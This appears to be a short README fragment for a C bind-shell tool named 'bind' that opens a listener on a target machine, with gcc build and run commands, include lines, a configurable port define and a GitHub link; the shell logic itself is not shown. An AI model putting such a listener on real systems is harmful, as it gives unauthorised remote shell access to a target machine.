bind is a bind-shell, which is a type of shell that opens up a listener on a target machine.
gcc -o bind bind.c
./bind
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 6965 // <- Go to this line in the file and change your port, if you want!
https://github.com/0x1CA3